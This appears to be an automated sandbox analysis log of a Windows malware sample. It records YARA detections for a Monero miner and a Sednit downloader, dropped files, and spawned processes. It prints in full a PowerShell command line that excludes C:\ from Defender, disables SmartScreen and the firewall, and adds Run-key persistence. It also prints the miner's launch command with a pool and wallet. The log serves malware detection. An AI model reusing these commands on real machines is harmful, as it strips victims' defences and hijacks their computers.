      Source: 34.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 34.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 32.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 32.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 7.0.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 7.0.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 7.2.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 7.2.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 32.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 32.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000040.00000003.551347186.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000001C.00000002.511059177.00000000007EB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000045.00000003.585994097.0000000003081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000046.00000003.606223139.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
      Source: 00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
      Source: 00000020.00000002.488689886.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
      Source: 00000020.00000002.488689886.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
      Source: 0000002D.00000002.539280863.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000022.00000002.498632171.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
      Source: 00000022.00000002.498632171.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
      Source: 00000040.00000002.628202386.00000000007EB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000003B.00000003.506427329.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000020.00000000.473740757.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
      Source: 00000020.00000000.473740757.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
      Source: 0000002D.00000003.482650411.0000000003161000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000001C.00000003.467408909.0000000003101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000003B.00000002.553935491.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000007.00000000.438260120.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
      Source: 00000007.00000000.438260120.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
      Source: 00000007.00000002.445162667.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
      Source: 00000007.00000002.445162667.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
      Source: Process Memory Space: UpSys.exe PID: 2296, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Users\user\AppData\Local\Temp\syphffm, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Windows\Temp\tgttoag, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Windows\Temp\nnuljvc, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Windows\Temp\ivlgocv, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Windows\Temp\wcavojr, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Users\user\AppData\Local\Temp\izrksvy, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\ProgramData\Systemd\mvsc32.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: C:\ProgramData\Systemd\mvsc32.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1860
      Source: C:\ProgramData\UpSys.exeFile deleted: C:\Windows\Temp\aut11F3.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
      Source: bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerRun.exe, vs bQQHP9ciRL.exe
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: SecurityJump to behavior
      Source: mvsc32.exe.0.drStatic PE information: Number of sections : 11 > 10
      Source: bQQHP9ciRL.exeVirustotal: Detection: 20%
      Source: bQQHP9ciRL.exeMetadefender: Detection: 25%
      Source: bQQHP9ciRL.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile read: C:\Users\user\Desktop\bQQHP9ciRL.exeJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\bQQHP9ciRL.exe "C:\Users\user\Desktop\bQQHP9ciRL.exe"
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\ProgramData\Systemd\mvsc32.exe --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\ProgramData\MicrosoftNetwork\System.exe "C:\ProgramData\MicrosoftNetwork\System.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exit
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\ProgramData\Systemd\mvsc32.exe --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
